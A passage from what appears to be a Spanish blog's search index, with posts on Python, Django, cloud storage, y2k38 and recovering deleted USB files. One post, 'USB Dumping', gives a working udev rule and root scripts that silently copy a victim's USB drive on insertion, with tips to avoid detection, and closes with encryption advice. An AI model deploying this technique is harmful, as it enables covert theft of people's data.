b In [3]: b = a / b In [4]: a = a / b In [5]: a, b Out[5]: (5.7, 3.2) ","permalink":"http://karpoke.ignaciocano.com/2010/12/03/intercambio-de-los-valores-de-dos-variables/","summary":"\u003cp\u003e\u003cimg alt=\"Teleporter\" loading=\"lazy\" src=\"/images/teleporter-300x299.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eEn algunos lenguajes, intercambiar el valor de la variable \u003ccode\u003ea\u003c/code\u003e por el de\nla variable \u003ccode\u003eb\u003c/code\u003e implica, explícitamente, utilizar una variable temporal:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003et = a;\na = b;\nb = t;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn Python:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ea, b = b, a\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePero esperen, aún hay más:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ea, b, c, d = d, c, b, a\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch4 id=\"actualizado-el-31-de-julio-de-2011\"\u003eActualizado el 31 de julio de 2011\u003c/h4\u003e\n\u003cp\u003eEn \u003ca href=\"http://www.commandlinefu.com/commands/view/8937/multiple-variable-assignments-from-command-output-in-bash\"\u003eBash\u003c/a\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ read a b c \u0026lt;\u0026lt;\u0026lt; $(echo $c $b $a)\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003ca href=\"http://www.commandlinefu.com/commands/view/8943/multiple-variable-assignments-from-command-output-in-bash\"\u003eOtra manera\u003c/a\u003e:\u003c/p\u003e","title":"Intercambio de los valores de dos variables"},{"content":"Una acción típica que se va a repetir en, prácticamente, cada listado que mostremos, es la de añadir un buscador [1]. Un buscador típico incluirá un pequeño formulario en la misma página de listado:\n\u0026lt;form method=\u0026#34;get\u0026#34; action=\u0026#34;\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;q\u0026#34; value=\u0026#34;{{ q }}\u0026#34; /\u0026gt; \u0026lt;input type=\u0026#34;submit\u0026#34; value=\u0026#34;Search\u0026#34; /\u0026gt; Nos interesaría no tener que ir copiando y pengando este código en cada listado. Aunque sea un código que no vaya a cambiar, viola el principio de DRY.\nUna mejor solución pasa por crear un templatetag, en el fichero my_tags.py dentro del directorio templatetags:\n@register.inclusion_tag(\u0026#39;search_form.html\u0026#39;, takes_context=True) def display_search_form(context): return { \u0026#39;q\u0026#39;: context[\u0026#39;q\u0026#39;], } search_forml.html es la plantilla HTML que contiene el formulario mostrado arriba. Mediante el decorador register.inclusion_tag permitimos que a la plantilla HTML le llegue la variable q del contexto, que contiene la búsqueda.\nY luego, en la plantilla del listado, incluimos el templatetag\n{% load my_tags %} Allá donde queramos que aparezca el buscador incluiremos lo siguiente:\n{% display_search_form %} Sólo queda ver el contenido de la vista que muestra el listado. En particular, deberemos recoger la variable q que nos puede llegar por GET. Algo así:\nq = request.GET.get(\u0026#34;q\u0026#34;, \u0026#34;\u0026#34;) Antes de modificar la consulta para filtrar los resultados que concuerden con nuestra búsqueda, hay diferentes aspectos que deberíamos tener en cuenta referentes a las búsquedas.\nLo primero es sobre qué vamos a buscar, es decir, sobre qué campos del modelo que vamos a buscar. Pero también podríamos tener una serie de palabras clave asociadas y guardadas en otro modelo qué también nos gustaría que se tuvieran en cuenta en la búsqueda. O podríamos buscar, para cada clave foránea, en los campos de ese modelo.\nLo siguiente es cómo interpretar esa búsqueda. Podríamos buscar una coincidencia exacta de todo lo que hemos buscado, que debería coincidir con, o estar contenida en, el contenido de un campo. También podríamos realizar una búsqueda más elaborada, separando la búsqueda en palabras. o añadir modificadores, estilo Google, para, por ejemplo, excluir palabras.\nUtilizaremos el código publicado por Julien Phalip para realizar esta búsqueda de forma que nos sirva para lo que pretendemos. El método de Julien separa las palabras de la búsqueda para montar un query que utiliza para filtrar el resultado según la lista de campos proporcionada. Nos basaremos en este método para extender la búsqueda a todos los campos del modelo y los campos de los modelos referenciados por las claves foráneas de éste.\ndef get_full_query(query_string, model): \u0026#34;\u0026#34;\u0026#34; Returns a query to search in every field of the given model \u0026#34;\u0026#34;\u0026#34; fields = [] for f in model._meta.fields: if not f.rel: fields.append(f.name) else: rel_fields = [ \u0026#34;%s__%s\u0026#34; % (f.name, fr.name) for fr in f.rel.to._meta.fields if not fr.rel ] fields.extend(rel_fields) return get_query(query_string, fields) model._meta.fields devuelve, como su nombre indica, un listado con los campos del modelo. Cada campo tiene, entre otros, los atributos name, con el nombre del campo, y rel, que, en el caso de una clave foránea, contiene el modelo al que hace referencia.\nEn la vista del listado tendremos:\nqueryset = MyTable._default_manager.all() # [2] if q: query = get_full_query(q, MyTable) queryset = queryset.filter(query) Este queryset contiene el listado que le pasamos a la plantilla:\nreturn render_to_response(\u0026#34;my_list.html\u0026#34;, { \u0026#34;object_list\u0026#34;: queryset, \u0026#34;q\u0026#34;: q, }, context_instance=RequestContext(request)) » [1] Existen aplicaciones para realizar búsquedas, como haystack\no `django-sphinx`. » [2] Según James Bennett, en \u0026ldquo;Django practical projects\u0026rdquo;, utilizar\n`_default_manager` en lugar de `objects` es una buena práctica, ya que podría ser que el modelo tuviera un _manager_ personalizado. Utilizar `_default_manager` siempre es seguro. ","permalink":"http://karpoke.ignaciocano.com/2010/11/19/buscar-en-todos-los-campos-de-un-modelo-en-django/","summary":"\u003cp\u003eUna acción típica que se va a repetir en, prácticamente, cada listado\nque mostremos, es la de añadir un buscador [1]. Un buscador típico\nincluirá un pequeño formulario en la misma página de listado:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026lt;form method=\u0026#34;get\u0026#34; action=\u0026#34;\u0026#34;\u0026gt;\n    \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;q\u0026#34; value=\u0026#34;{{ q }}\u0026#34; /\u0026gt;\n    \u0026lt;input type=\u0026#34;submit\u0026#34; value=\u0026#34;Search\u0026#34; /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eNos interesaría no tener que ir copiando y pengando este código en cada\nlistado. Aunque sea un código que no vaya a cambiar, viola el principio\nde DRY.\u003c/p\u003e","title":"Buscar en todos los campos de un modelo en Django"},{"content":"Si tenemos una aplicación multiusuario, podría darse el caso de que dos usuarios accediesen simultáneamente al mismo registro para editarlo. Si no controlamos este evento, sucederá que el primero que guarde, que no tiene porqué ser el primero que comenzó a editar, perderá los cambios, y lo que es peor, sin enterarse.\nUna solución sería utilizar transacciones [1], pero éstas deberían abarcar varias peticiones HTTP, desde que se empieza a editar hasta que se guarda satisfactoriamente (o no), con lo que la solución idónea se complica. Una solución más sencilla, pero efectiva en la inmensa mayoría de casos, es utilizar el control de concurrencia optimista (también comentado en slashdot).\nEl control de concurrencia optimista se basa en el hecho de que es bastante improbable que la edición concurrente se dé, por lo que la solución más sencilla pasa por detectarla y avisar al usuario en caso de que ocurra, obligándole a repetir el proceso de edición. La simplicidad de la solución unida a la baja probabilidad de que suceda hacen de ella una solución interesante y práctica. Lo de la baja probabilidad es importante, ya que si los usuarios tuvieran que estar constantemente repitiendo el proceso de edición dejaría de ser una solución práctica.\nPara implementarla, necesitamos conocer si el registro que estamos editando ha sido modificado desde la última vez que accedimos a él. Podemos lograr esto incluyendo un campo que contenga un número de versión, que se incrementa con cada edición. Si a la hora de guardar, el número de versión no es el mismo que había cuando nosotros accedimos al registro, es que alguien se nos ha adelantado. En lugar de un número de versión, también podemos utilizar un campo timestamp. La ventaja de éste último es que podemos definir el campo con la opción auto_now=True y nos olvidamos de tener que actualizarlo, ya que ya lo hacer Django por nosotros.\nEl siguiente ejemplo, proporcionado por Andrei Savu, muestra la idea:\nupdated = Entry.objects.filter(Q(id=e.id) \u0026amp;\u0026amp; Q(version=e.version)) .update(updated_field=new_value, version=e.version+1) if not updated: raise ConcurrentModificationException() La operación se realiza de forma atómica, ya que filter es un método perezoso, es decir, no implica un operación de base de datos inmediatamente.\nOtra solución propuesta consiste en sobreescribir el método save para comprobar si el registro ha sido modificado justo antes de guardarlo (en lugar de filtrar y actualizar):\ndef save(self): if(self.id): foo = Foo.objects.get(pk=self.id) if(foo.timestamp \u0026gt; self.timestamp): raise Exception, \u0026#34;trying to save outdated Foo\u0026#34; super(Foo, self).save() Sin embargo, esta solución presenta un problema de condición de carrera. La operación de consultar el último valor y la operación de guardar no se realizan de forma atómica, por lo que podría darse el caso de que ambos guardasen a la vez y el sistema ejecutara las instrucciones de tal manera (alternativamente, para ser más concretos) que cada uno pensaría que había sido el último en guardar, por lo que el segundo sobreescribiría al primero, pero sin que a éste se le notificara.\n[1] Existe una aplicación para Django, django-locking, que nos brinda el control de concurrencia, permitiendo, además, que los usuarios sepan si un registro ha sido bloqueado, e incluso que les permita acceder en modo de sólo lectura.\n","permalink":"http://karpoke.ignaciocano.com/2010/11/05/control-de-concurrencia-optimista-en-django/","summary":"\u003cp\u003eSi tenemos una aplicación multiusuario, podría darse el caso de que dos\nusuarios accediesen simultáneamente al mismo registro para editarlo. Si\nno controlamos este evento, sucederá que el primero que guarde, que no\ntiene porqué ser el primero que comenzó a editar, perderá los cambios, y\nlo que es peor, sin enterarse.\u003c/p\u003e\n\u003cp\u003eUna solución sería utilizar \u003ca href=\"http://docs.djangoproject.com/en/dev/topics/db/transactions/\"\u003etransacciones\u003c/a\u003e [1], pero éstas deberían\nabarcar varias peticiones HTTP, desde que se empieza a editar hasta que\nse guarda satisfactoriamente (o no), con lo que la solución idónea se\ncomplica. Una solución más sencilla, pero efectiva en la inmensa mayoría\nde casos, es utilizar el \u003ca href=\"http://stackoverflow.com/questions/320096/django-how-can-i-protect-against-concurrent-modification-of-data-base-entries\"\u003econtrol de concurrencia optimista\u003c/a\u003e (también\ncomentado en \u003ca href=\"http://hardware.slashdot.org/comments.pl?sid=1381511\u0026amp;cid=29536367\"\u003eslashdot\u003c/a\u003e).\u003c/p\u003e","title":"Control de concurrencia optimista en Django"},{"content":"Ubuntu One es el servicio que ofrece Ubuntu en la nube. Entre otras cosas, como sincronizar archivos de configuración o nuestros favoritos, permite compartir archivos y directorios de nuestro espacio en la nube con las personas que queramos de una forma sencilla.\nTambíen permite publicar archivos, para cada uno de los cuales se genera una URL corta, y que sean accesibles por cualquiera. Sin embargo, no permite publicar directorios, al menos por ahora.\n¿Publicar directorios? ¿Qué querríamos conseguir publicando un directorio? Pues que todos los ficheros que contuviera se hicieran públicos, y que se generase un índice, por ejemplo, un index.html, también público, con enlaces a cada fichero contenido en dicho directorio (recordemos que los enlaces son URLs cortas, no el nombre del fichero).\n¿URLs cortas? Cuando se publica un fichero, el sistema le asigna una dirección del estilo http://ubuntuone.com/p/N21/, por lo que no podemos crear un listado de ficheros basándonos en su nombre y situación relativa al fichero index.html. Es decir, no podemos incluir enlaces como \u0026lt;a href=\u0026quot;./articles/index.html\u0026quot;\u0026gt;articles\u0026lt;a\u0026gt;.\nAlternativa: ¿Dropbox? Un servicio similar a Ubuntu One es Dropbox, que tampoco permite publicar directorios, al menos directamente, pero el problema anterior queda resuelto, ya que no tiene el inconveniente de las URLs cortas. Basta crear un fichero HTML con enlaces relativos a los ficheros que queramos ofrecer. Se podría crear un listado con el comando tree:\n$ tree -C --charset utf8 --dirsfirst -F -H . -o tree.html Sin embargo, esto tiene un problema, y es que si se pulsa en el enlace de un directorio, obtenemos como resultado que el archivo no existe, ya que tree crea los enlaces a directorios como ./articles/ (Dropbox tampoco permite publicar directorios). Una sencilla solución sería crear ficheros index.html en cada directorio y que los enlaces a los subdirectorios realmente apuntasen a los ficheros index.html que éstos contienen. Esto es lo que hace DropboxIndex, un script creado por Wojciech \u0026lsquo;KosciaK\u0026rsquo; Pietrzok que genera un archivo index.html en la raíz y en cada subdirectorio, con un aspecto similar al listado de ficheros de Apache.\nEl contenido público, por defecto, se encuentra a partir del directorio ~/Dropbox/Public y es posible utilizar enlaces simbólicos que apunten a directorios externos al directorio público.\nDe todas formas, un gran inconveniente que le veo a Dropbox es que, para gestionarlo desde el escritorio, es necesario instalarse software privativo.\nAlternativa: ¿Ubunu One? Ubuntu One también tiene partes del servidor que son software privativo, pero parece que, al menos, el cliente y los protocolos de comunicación son libres (también se dice algo aquí).\n¿Y las URLs cortas? Existe un comando, u1sdtool, que permite gestionar nuestro espacio en la nube desde el terminal. Con u1sdtool y partiendo del script anterior, he conseguido que se puedan publicar directorios en Ubuntu One. Lo único que se necesita para acceder al directorio, o jerarquía de directorios, es conocer la dirección pública del directorio raíz que hemos publicado.\nPodemos tener tantos directorios raíz como queramos, siempre que no esté contenido uno dentro de otro, ya que sería éste otro el que sería el directorio raíz. Aún así, se pueden compartir enlaces de directorios públicos intermedios, pero teniendo en cuenta que aparece un enlace para ir subiendo en la jerarquía de directorios hasta llegar al directorio raíz.\nubuntuone-index.py Se utiliza exactamente igual que el script para Dropbox:\nUsage: ubuntuone-index.py [options] directory Options: -h, --help Show help message and exit. -V, --version print version information -R, --recursive Include subdirectories (disabled by default). -T, --template file Use HTML file as template. ATTENTION: Script will overwrite any existing index.html file(s)! Por ejemplo:\n$ ubuntuone-index.py -R \u0026#34;~/Ubuntu One/pub\u0026#34; Descarga el script ubuntuone-index.py.\nPara más información de cómo crear las plantillas personalizadas podéis visitar la web del proyecto DropboxIndex.\nPrivacidad y términos del servicio Si lo he entendido bien, en su política de privacidad advierten de que obtienen datos del uso que hagamos del servicio, que puede que nos envíen algun correo electrónico ocasionalmente, que posiblemente le pasarán esa información a terceros, aunque intentarán que esos terceros sean buena gente con esos datos, y, lo más interesante, que si violas los términos del servicio, lo tienen todo registrado.\nSe violan los términos del servicio haciendo algo ilegal o en contra de los derechos o la privacidad de alguien, pudiendo incluso tener que indemnizar a Canonical por posibles daños y perjuicios, y aquí ya no dicen nada de sí te avisan o si primero borran los datos y luego te avisan\nLa licencia de uso de Ubuntu One advierte de diferentes maneras de terminar el uso del servicio:\npor que lo dicen ellos, aunque se supone que te avisan con un mes de antelación de que borrarán nuestros datos por que pasamos de su servicio y no lo hemos usado en 3 meses; también avisan con antelación por que violas los términos del servicio Por mi parte, todo lo que he subido a mi directorio para hacer las pruebas es contenido, muy bueno, con una licencia libre, que autoriza su redistribución.\n","permalink":"http://karpoke.ignaciocano.com/2010/10/31/como-publicar-directorios-en-ubuntu-one-y-dropbox/","summary":"\u003cp\u003e\u003ca href=\"http://one.ubuntu.com/\"\u003eUbuntu One\u003c/a\u003e es el servicio que ofrece Ubuntu en la nube. Entre otras\ncosas, como \u003ca href=\"http://wiki.ubuntu.com/UbuntuOne/Tutorials/\"\u003esincronizar archivos de configuración o nuestros\nfavoritos\u003c/a\u003e, permite \u003ca href=\"http://wiki.ubuntu.com/UbuntuOne/Tutorials/FileSharing\"\u003ecompartir archivos y directorios\u003c/a\u003e de nuestro\nespacio en la nube con las personas que queramos de una forma sencilla.\u003c/p\u003e\n\u003cp\u003eTambíen permite publicar archivos, para cada uno de los cuales se genera\nuna URL corta, y que sean accesibles por cualquiera. Sin embargo, \u003ca href=\"http://lists.launchpad.net/ubuntuone-users/msg00523.html\"\u003eno\npermite publicar directorios\u003c/a\u003e, al menos por ahora.\u003c/p\u003e","title":"Cómo publicar directorios en Ubuntu One y Dropbox"},{"content":" Cuando el Imperio Galáctico entró en decadencia, Hari Seldon, miembro de la corte del Emperador Cleón I, desarrolló la ciencia de la Psicohistoria. De esta manera, predijo que cuando el Imperio terminara de derrumbarse, comenzaría una edad oscura de 30.000 años, con la galaxia sumida en el caos. Esta edad terminaría con el ascenso de un Nuevo Imperio. Usando las leyes de esta nueva ciencia, Seldon inventó un plan para reducir el interregnum de 30.000 a sólo 1.000 años, plantando las semillas de una nueva civilización.\nSeldon, con la ayuda de Las Zenow, bibliotecario mayor de Trántor, encontró dos planetas donde crear civilizaciones adecuadas para convertirse en un Segundo Imperio Galáctico milenios después. Tras una larga búsqueda, Terminus fue elegido como el más apropiado. Seldon manipuló a la poderosa Comisión de Seguridad Pública para enviar una colonia bajo su control a Terminus. La colonia estaba formada por 100.000 científicos especialmente elegidos, de buena salud, con el propósito original de publicar la primera Enciclopedia Galáctica.\nSin embargo, el verdadero motivo de Seldon era crear el núcleo de una civilización que luego sería conocida como Fundación.\n\u0026ldquo;La Fundación\u0026rdquo;, Isaac Asimov\nEste servidor, de nombre Términus, es un viejo portátil venido a sobremesa. La batería ya hace tiempo que pasó a mejor vida, aunque tiempo antes ya había tenido problemas con la tarjeta gráfica.\nComenzaron apareciendo patrones extraños que cambiaban de color según el color del fondo. En la captura se puede ver que con el fondo blanco se veían azules. La imagen anterior es una captura de pantalla, no una foto, por lo que parecía ser un problema de la tarjeta gráfica. Lo segundo que probé fue conectarlo a un monitor externo, y seguía haciéndo lo mismo. Sin embargo, al desconectarlo del monitor, sólo el cuadrante superior izquierdo de la pantalla quedó rellanado con esos patrones, el resto de la pantalla se veía bien. Era el mismo patrón, con el mismo número de \u0026ldquo;rectángulos\u0026rdquo;, pero más pequeños y ocupando sólo el cuadrante superior izquierdo; supongo que tendría algo que ver con la diferencia de resolución de pantalla del monitor respecto a la pantalla del portátil. De todas formas, tras reiniciar, el patrón se volvió a repetir en toda la pantalla, y los rectángulos volvieron a su tamaño inicial.\nPoco tiempo después, también mostraba cosas raras mientras arrancaba el portátil. Los mensajes de inicio y el menú de GRUB mostraban caracteres extraños, como si los píxeles hubieran sido puestos al azar, pero sólo en los caracteres que no eran ASCII-127. Es decir, en los caracteres como las vocales acentuadas o los típicos caracteres que se emplean para encuadrar un texto en ASCII.\nAl final, también comenzó a hacerlo en los terminales de texto, Ctrl+Alt+F{1..6}, mostrando una interfaz de usuario caleidoscópica.\n","permalink":"http://karpoke.ignaciocano.com/2010/10/28/the-name-of-the-game/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCuando el Imperio Galáctico entró en decadencia, Hari Seldon, miembro\nde la corte del Emperador Cleón I, desarrolló la ciencia de la\nPsicohistoria. De esta manera, predijo que cuando el Imperio terminara\nde derrumbarse, comenzaría una edad oscura de 30.000 años, con la\ngalaxia sumida en el caos. Esta edad terminaría con el ascenso de un\nNuevo Imperio. Usando las leyes de esta nueva ciencia, Seldon inventó\nun plan para reducir el interregnum de 30.000 a sólo 1.000 años,\nplantando las semillas de una nueva civilización.\u003c/p\u003e","title":"The name of the game"},{"content":"El USB Dumping consiste en copiar el contenido de un USB introducido en un ordenador, sin que la víctima se entere.\nEn Ubuntu, podemos conseguir que se ejecute el script que llevará a cabo el robo de información, cuando se conecte un dispositivo USB. Para ello, deberemos crear alguna regla de udev.\nudev y sysfs udev se encarga de crear los nodos en /dev para los dispositivos presentes en el sistema. Para ello, se basa en la información prorcionada por sysfs y una serie de reglas proporcionadas por el usuario. sysfs devuelve información de los dispositivos conectados al sistema, y udev lo utiliza para crear los nodos /dev.\nReglas Las reglas se guardan en ficheros de configuración dentro del directorio /etc/udev/rules.d. Los nombres de los ficheros pueden tener un número al comienzo, en función de la prioridad y de algunos privilegios que les queramos otorgar. En el archivo README que hay en ese directorio hay una pequeña explicación de esto. A nosotros nos basta con saber que, como no nos importa el orden, nuestro fichero de reglas no necesita llevar prefijo numérico. Podría llamarse, por ejemplo: /etc/udev/rules.d/usb-dumping.rules.\nLas reglas podrán ser aplicadas inmediatamente después de haber guardado el fichero, ya que no es necesario reiniciar el demonio.\nPara nuestro caso, la regla sería:\nKERNEL==\u0026#34;sd[b-d]1\u0026#34;, ACTION==\u0026#34;add\u0026#34;, RUN+=\u0026#34;/home/karpoke/usb-dumping.sh %k\u0026#34; donde\nKERNEL==\u0026quot;sd[b-d]1\u0026quot;, especifica que la regla se debe ejecutar cada vez que el kernel asigne un nombre como `sdb1`, `sdc1` ó `sdd1`. Evitamos el `/dev/sda` porque es donde está montado el sistema. También hemos evitado interesarnos por otras particiones que pudiera haber en el disco: `sdb2`, `sdb5`, etc... ACTION==\u0026quot;add\u0026quot;, especifica que la regla se debe ejecutar cuando se conecte el dispositivo. Lo contrario sería _remove_. RUN+=\u0026quot;...\u0026quot;, especifica el script que hay que ejecutar cuando se cumplen las condiciones. %k, es el nombre que le asigna el kernel al dispositivo y se lo pasamos al _script_ como parámetro. En el fichero /var/log/messages, podremos obtener información útil acerca de los dispositivos conectados y de si no encuentra nuestro script o no puede ejecutarlo, pero, ¡ojo!, no saldrá nada si nuestro script no hace lo que toca o si tiene algún error de sintaxis.\nVolcado dd El script, que se ejecuta como root, es importante que esté marcado como ejecutable y contenga el shebang en la primera línea, ya que udev no lo ejecutará en un terminal ni en una consola. Podría ser algo tan sencillo como:\n#!/bin/sh devname=\u0026#34;$1\u0026#34; # p.ej: sdb1 dd if=/dev/$devname of=/tmp/$devname.dd \u0026amp; Debemos utilizar el \u0026amp; para asegurarnos de que la ejecución del script continúa en segundo plano. La ventaja de usar dd es que no bloquea el dispositivo, por lo que si la víctima lo retira no pasará nada. Otra ventaja es que se podrían copiar archivos que la víctima haya eliminado de su USB. El principal inconveniente es que se creará un fichero del mismo tamaño que el USB entero, aunque éste estuviera vacío, con el tiempo que eso puede conllevar. [haciendo pruebas, me ha tardado 1 minuto y 15 segundos para un USB de 1 GByte]\nPara recuperar la información del archivo volcado, deberemos montarlo en un directorio:\n$ mkdir ~/usb_fs $ sudo mount -o loop,ro,noexec,nodev /tmp/sdb1.dd ~/usb_fs La opción noexec para el mount es importante, ya que no nos gustaría que ese USB estuviera infectado y programado para ejecutar algún tipo de script al montarse.\ncp En lugar de usar dd podríamos utilizar cp, con la ventaja de que sólo copia los ficheros y directorios existentes en el USB. En este caso, el inconveniente es que se bloquea el USB, y no dejará que el dispositivo se expulse de forma segura hasta que haya terminado la copia.\nHay que tener en cuenta que no podemos utilizar cp directamente con /dev/sdb1, sino que primero deberemos montar el dispositivo.\n#!/bin/sh devname=\u0026#34;$1\u0026#34; # p.ej: sdb1 mkdir /mnt/$devname mount /dev/$devname /mnt/$devname cp -fr /mnt/$devname /tmp \u0026amp; Sin embargo, esto tiene otro problema, y es que al haber montado el dispositivo, Ubuntu no lo vuelve a montar y, por tanto, no se muestra al usuario. Podríamos abrir el directorio en un ventana de Gnome con algo como:\nexport DISPLAY=:0.0 nautilus /mnt/$devname Por otro lado, si lo hacemos así, el directorio de montaje no se llamará como el nombre del volumen del USB, cosa que podría llamar la atención del usuario.\nAdemás, deberíamos asegurarnos de eliminar el directorio recién creado y desmontar el dispositivo cuando éste se extraiga. Esto lo podríamos hacer con otra regla en nuestro fichero de reglas para udev:\nKERNEL==\u0026#34;sd?1\u0026#34;, ACTION==\u0026#34;remove\u0026#34;, RUN+=\u0026#34;/home/karpoke/usb-dumping-umount.sh \u0026#39;%k\u0026#39;\u0026#34; y en este script para demontar la unidad tendríamos algo como:\numount /dev/$devname rm -fr /mnt/$devname ¿Y si pudiéramos matar el proceso de copia del primer script desde este último script, con un pkill, por ejemplo? No sirve, ya que este script se ejecuta cuando el dispositivo ya ha sido desconectado, y en el caso de que utilicemos la opción con cp y el usuario no podrá sacar el USB de forma segura antes de que la copia haya terminado.\nProtección La única solución que se me ocurre para protegernos de una forma segura de este tipo de ataques es, o bien no utilizar nuestro USB en ningún otro ordenador, cosa harto improbable si lo que queremos con el USB es tener nuestros archivos independientemente del ordenador en el que estemos, o bien cifrar el contenido del USB, en todo o en parte.\n","permalink":"http://karpoke.ignaciocano.com/2010/10/27/usb-dumping/","summary":"\u003cp\u003eEl \u003ca href=\"http://www.seguridadapple.com/2010/10/usb-dumping-en-mac-os-x.html\"\u003eUSB Dumping\u003c/a\u003e consiste en copiar el \u003ca href=\"/2010/10/27/recuperando-archivos-del-usb/\"\u003econtenido de un USB\u003c/a\u003e\nintroducido en un ordenador, sin que la víctima se entere.\u003c/p\u003e\n\u003cp\u003eEn Ubuntu, podemos conseguir que se ejecute el \u003cem\u003escript\u003c/em\u003e que llevará a\ncabo el robo de información, cuando se conecte un dispositivo USB. Para\nello, deberemos crear alguna \u003ca href=\"http://www.reactivated.net/writing_udev_rules.html\"\u003eregla de \u003ccode\u003eudev\u003c/code\u003e\u003c/a\u003e.\u003c/p\u003e\n\u003ch2 id=\"udev-y-sysfs\"\u003e\u003ccode\u003eudev\u003c/code\u003e y \u003ccode\u003esysfs\u003c/code\u003e\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003eudev\u003c/code\u003e se encarga de crear los nodos en \u003ccode\u003e/dev\u003c/code\u003e para los dispositivos\npresentes en el sistema. Para ello, se basa en la información\nprorcionada por \u003ccode\u003esysfs\u003c/code\u003e y una serie de reglas proporcionadas por el\nusuario. \u003ccode\u003esysfs\u003c/code\u003e devuelve información de los dispositivos conectados al\nsistema, y \u003ccode\u003eudev\u003c/code\u003e lo utiliza para crear los nodos \u003ccode\u003e/dev\u003c/code\u003e.\u003c/p\u003e","title":"USB Dumping"},{"content":"\n$ grep INT_MAX /usr/include/limits.h # define INT_MAX 2147483647 $ date -u -d @2147483647 mar ene 19 03:14:07 UTC 2038 $ date -d @2147483647 mar ene 19 04:14:07 CET 2038 $ date -u -d @2147483648 date: fecha ``@2147483648\u0026#39;\u0026#39; inválida ","permalink":"http://karpoke.ignaciocano.com/2010/10/27/y2k38/","summary":"\u003cp\u003e\u003cimg alt=\"Nuke mushroom\" loading=\"lazy\" src=\"/images/nuke_mushroom-300x165.jpg\"\u003e\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ grep INT_MAX /usr/include/limits.h\n#  define INT_MAX   2147483647\n$ date -u -d @2147483647\nmar ene 19 03:14:07 UTC 2038\n$ date -d @2147483647\nmar ene 19 04:14:07 CET 2038\n$ date -u -d @2147483648\ndate: fecha ``@2147483648\u0026#39;\u0026#39; inválida\n\u003c/code\u003e\u003c/pre\u003e","title":"y2k38"},{"content":"Tengo la mala costumbre de borrar archivos utilizando la combinación shift+del, para borrarlos directamente sin pasar por la papelera. Llegará el momento en que borre algo que no debería o algo que necesitaré más tarde.\nSi esto sucediese, lo mejor podría ser:\nDesmontar el USB para evitar males mayores $ sudo umount /media/miusb # \u0026#39;miusb\u0026#39; es el nombre del volumen del USB Hacer una copia del USB con dd $ dd if=/dev/sdb1 of=/tmp/miusb.dd # sdb1 es la unidad donde se monta el USB Podemos listar los archivos borrados con ils $ ils -r /tmp/miusb.dd class|host|device|start_time ils|anacreonte||1288172460 st_ino|st_alloc|st_uid|st_gid|st_mtime|st_atime|st_ctime|st_crtime|st_mode|st_nlink|st_size 8|f|0|0|1263329350|1265842800|0|1263329350|777|0|33076 12|f|0|0|1265738134|1288130400|0|1265738134|777|0|31609 14|f|0|0|1263325690|1288130400|0|1263325690|777|0|28946 16|f|0|0|1263326438|1288130400|0|1263326438|777|0|2305751 19|f|0|0|1263327386|1288130400|0|1263327386|777|0|91028 Creamos un directorio para tener todos los archivos que se puedan recuperar $ mkdir /tmp/miusb_tmp Recuperamos los archivos con icat $ for i in $(ils -r /tmp/miusb.dd | awk \u0026#39;{print $1}\u0026#39; FS=\u0026#34;|\u0026#34; | sed 1,3d); do icat -r /tmp/miusb.dd $i \u0026gt; /tmp/miusb_tmp/$i echo $i done Comprobamos el tipo de archivos recuperados $ file /tmp/miusb_tmp/* 8: OpenDocument Text 12: PDF document, version 1.2 14: PDF document, version 1.3 16: PDF document, version 1.4 19: PDF document, version 1.2 ils y icat vienen incluidos en el paquete sleuthkit, que se encuentra en los repositorios. También existe autopsy, que es una interfaz web para sleuthkit.\n","permalink":"http://karpoke.ignaciocano.com/2010/10/27/recuperando-archivos-del-usb/","summary":"\u003cp\u003eTengo la mala costumbre de borrar archivos utilizando la combinación\n\u003ccode\u003eshift+del\u003c/code\u003e, para borrarlos directamente sin pasar por la papelera.\nLlegará el momento en que borre algo que no debería o algo que\nnecesitaré más tarde.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Sushi USB2\" loading=\"lazy\" src=\"/images/sushi_usb_2-300x190.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eSi esto sucediese, lo mejor podría ser:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eDesmontar el USB para evitar males mayores\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo umount /media/miusb # \u0026#39;miusb\u0026#39; es el nombre del volumen del USB\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"2\"\u003e\n\u003cli\u003eHacer una copia del USB con \u003ccode\u003edd\u003c/code\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ dd if=/dev/sdb1 of=/tmp/miusb.dd # sdb1 es la unidad donde se monta el USB\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"3\"\u003e\n\u003cli\u003ePodemos listar los archivos borrados con \u003ccode\u003eils\u003c/code\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ ils -r /tmp/miusb.dd\n\u003c/code\u003e\u003c/pre\u003e\u003cpre 